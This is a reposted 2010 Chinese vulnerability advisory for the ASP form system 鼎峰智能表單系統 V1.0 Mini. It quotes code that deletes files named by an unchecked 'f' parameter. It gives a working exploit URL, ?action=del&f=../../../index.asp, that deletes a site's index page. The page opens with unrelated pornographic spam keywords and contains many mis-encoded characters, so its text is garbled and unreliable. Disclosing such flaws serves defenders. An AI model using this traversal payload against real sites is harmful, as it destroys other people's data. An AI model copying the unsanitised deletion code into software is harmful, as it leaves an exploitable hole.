国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

發(fā)布日期：2010-07.06  
發(fā)布作者：不詳
影響版本：鼎峰智能表單系統(tǒng)(ASP) V1.0 Mini 
漏洞描述：鼎峰智能表單系統(tǒng)(ASP) V1.0 Mini 跨目錄刪除文件漏洞
 elseif Request.QueryString("action")="del" then 'QueryString傳輸，不多說   f=Request.QueryString("f") ‘也是QueryString，取得“f”變量   if f<>"" then '判斷f是否空字符   Set fso=server.createobject("scripting.filesystemobject")   fso.DeleteFile Server.MapPath("./dbbak/"&f) '直接引用了“f”   set fso=nothing   url_go "刪除成功!","db_manage.asp"   else   url_go "沒有找到指定文件!","db_manage.asp"   end if

 

而下面的引用為：
<a href="?action=del&f=<%=item.Name%>" onclick="javascript:return confirm('您確定要繼續(xù)執(zhí)行該操作嗎？');">刪除</a>
 
取得變量“f”，而且f變量是處理的真實文件名（item.Name） 就直接引用在 Server.MapPath("./dbbak/"&f)
 
執(zhí)行方法：
http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index.asp
 

TAG標(biāo)簽： 漏洞 鼎峰智能表單系統(tǒng) 刪文件漏洞

本文轉(zhuǎn)自 ☆★ 包羅萬象網(wǎng) ★☆ - http://www.baoluowanxiang.com 轉(zhuǎn)載請注明出處，侵權(quán)必究！
原文鏈接：http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0709/1157.html

本站僅提供存儲服務(wù)，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請點擊舉報。